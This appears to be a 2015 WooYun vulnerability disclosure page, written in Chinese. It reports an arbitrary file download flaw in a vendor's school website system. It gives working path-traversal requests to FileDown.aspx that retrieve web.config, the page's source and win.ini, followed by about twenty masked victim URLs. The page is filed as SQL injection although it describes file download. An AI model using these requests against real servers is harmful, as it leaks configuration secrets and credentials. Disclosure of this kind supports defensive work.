当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128458

漏洞标题:某通用型学校建站系统任意文件下载

相关厂商:杭州毕辉科技有限公司

漏洞作者: 路人甲

提交时间:2015-07-25 10:52

修复时间:2015-10-25 20:54

公开时间:2015-10-25 20:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-25: 细节已通知厂商并且等待厂商处理中
2015-07-27: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-07-30: 细节向第三方安全合作伙伴开放
2015-09-20: 细节向核心白帽子及相关领域专家公开
2015-09-30: 细节向普通白帽子公开
2015-10-10: 细节向实习白帽子公开
2015-10-25: 细节向公众公开

简要描述:

用户量较大~话说这个系统的漏洞实在是少,到现在我还没找到一处SQL注入,全部都进行了类型匹配。一处任意文件下载献上

详细说明:

厂商:
  杭州毕辉科技有限公司 位于浙江 杭州市下城区,主营 教育软件、课改软件 等。公司秉承“顾客至上,锐意进取”的经营理念,坚持“客户第一”的原则为广大客户提供优质的服务。欢迎惠顾。杭州毕辉科技有限公司是专业教育科技公司。目前主要面向于中小学普教领域开发优质教育软件,推进普及校校通项目实施等多方面的业务。公司拥有一支专业化的团队,其中包括专业的教育分析专家、专业的教育软件开发技术人员、专业的服务团队。公司周围吸引了一批共同合作的教育工作者,为公司软件产品的质量与应用性提供全面检测。毕辉科技研发教育软件产品首先坚持实用性原则,研发的产品功能不求全面花哨,我们追求严谨的逻辑,稳定的数据运行和实用易于操作的功能。
任意文件下载:

下载源文件:
/Components/FileDown.aspx?OldName=FileDown.aspx&NewName=../../Components/FileDown.aspx
下载web.config
/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
下载win.ini
/Components/FileDown.aspx?OldName=win.ini&NewName=c:/windows/win.ini


Case:

http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
http://**.**.**.**//Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
http://**.**.**.**/Components/FileDown.aspx?OldName=web.config&NewName=../../web.config
等等..还有好几页我就懒得加上了

漏洞证明:

Security Testing:

1、

01.png


2、

02.png


3、

03.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-07-27 20:53

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商(或网站管理单位)的直接处置渠道,待认领。

最新状态:

暂无